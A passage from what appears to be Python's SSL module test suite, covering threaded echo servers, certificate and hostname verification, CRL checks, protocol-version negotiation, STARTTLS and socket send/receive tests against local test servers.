asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
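# Minimal usage sketch for server_params_test(), assuming a client/server
# context pair such as the one returned by testing_context():
#
#   client_context, server_context, hostname = testing_context()
#   stats = server_params_test(client_context, server_context,
#                              chatty=False, connectionchatty=False,
#                              sni_name=hostname)
#   # stats['version'], stats['cipher'], etc. describe the negotiated session.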
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
if not has_tls_protocol(protocol):
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
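            # Entries with expect_success=False (sendto, recvfrom, recvfrom_into)
            # are expected to raise ValueError on an SSLSocket; the test only
            # requires that the error message start with the method name.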
data_prefix = "PREFIX_"
